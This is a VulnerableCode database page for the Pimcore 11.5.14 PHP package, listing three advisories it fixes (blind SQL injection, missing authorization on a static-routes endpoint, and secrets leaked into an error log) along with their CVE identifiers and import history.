VulnerableCode Package Details - pkg:composer/pimcore/pimcore@11.5.14

Search for packages

Vulnerability	Summary	Fixed by
This package is not known to be affected by vulnerabilities.

Vulnerability

Summary

Fixed by

This package is not known to be affected by vulnerabilities.

Vulnerability	Summary	Aliases
VCID-53nb-8vf3-9ubb	Pimcore Has an Incomplete Patch for CVE-2023-30848 An incomplete SQL injection patch in the Admin Search Find API allows an authenticated attacker to perform blind SQL injection. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to database information disclosure.	CVE-2026-23492 GHSA-qvr7-7g55-69xj
VCID-xvhk-gv9z-53hb	Pimcore is Vulnerable to Broken Access Control: Missing Function Level Authorization on "Static Routes" Listing The application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitive route configurations. This violates OWASP A01:2021 Broken Access Control, as function-level authorization is absent, allowing unauthorized access to internal routing metadata. Without validation, the endpoint exposes route structures, potentially revealing application architecture, endpoints, or custom logic intended for administrative roles only.	CVE-2026-23494 GHSA-m3r2-724c-pwgf
VCID-yrnf-q3z4-jfh1	Pimcore ENV Variables and Cookie Informations are exposed in http_error_log The http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend.	CVE-2026-23493 GHSA-q433-j342-rp9h

Vulnerability

Summary

Aliases

VCID-53nb-8vf3-9ubb

Pimcore Has an Incomplete Patch for CVE-2023-30848 An **incomplete SQL injection patch** in the Admin Search Find API allows an authenticated attacker to perform **blind SQL injection**. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to **database information disclosure**.

CVE-2026-23492
GHSA-qvr7-7g55-69xj

VCID-xvhk-gv9z-53hb

Pimcore is Vulnerable to Broken Access Control: Missing Function Level Authorization on "Static Routes" Listing The application fails to enforce proper server-side authorization checks on the API endpoint responsible for reading or listing static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the var/config/staticroutes.php file, including details like regex-based patterns, controllers, variables, and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing revealed that an authenticated backend user lacking explicit permissions was able to invoke the endpoint (e.g., GET /api/static-routes) and retrieve sensitive route configurations. This violates OWASP A01:2021 Broken Access Control, as function-level authorization is absent, allowing unauthorized access to internal routing metadata. Without validation, the endpoint exposes route structures, potentially revealing application architecture, endpoints, or custom logic intended for administrative roles only.

CVE-2026-23494
GHSA-m3r2-724c-pwgf

VCID-yrnf-q3z4-jfh1

Pimcore ENV Variables and Cookie Informations are exposed in http_error_log The http_error_log file stores the $_COOKIE and $_SERVER variables, which means sensitive information such as database passwords, cookie session data, and other details can be accessed or recovered through the Pimcore backend.

CVE-2026-23493
GHSA-q433-j342-rp9h

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2026-06-02T04:49:32.716175+00:00	GitLab Importer	Fixing	VCID-xvhk-gv9z-53hb	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23494.yml	38.6.0
2026-06-02T04:49:32.409352+00:00	GitLab Importer	Fixing	VCID-yrnf-q3z4-jfh1	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23493.yml	38.6.0
2026-06-02T04:49:31.741499+00:00	GitLab Importer	Fixing	VCID-53nb-8vf3-9ubb	https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23492.yml	38.6.0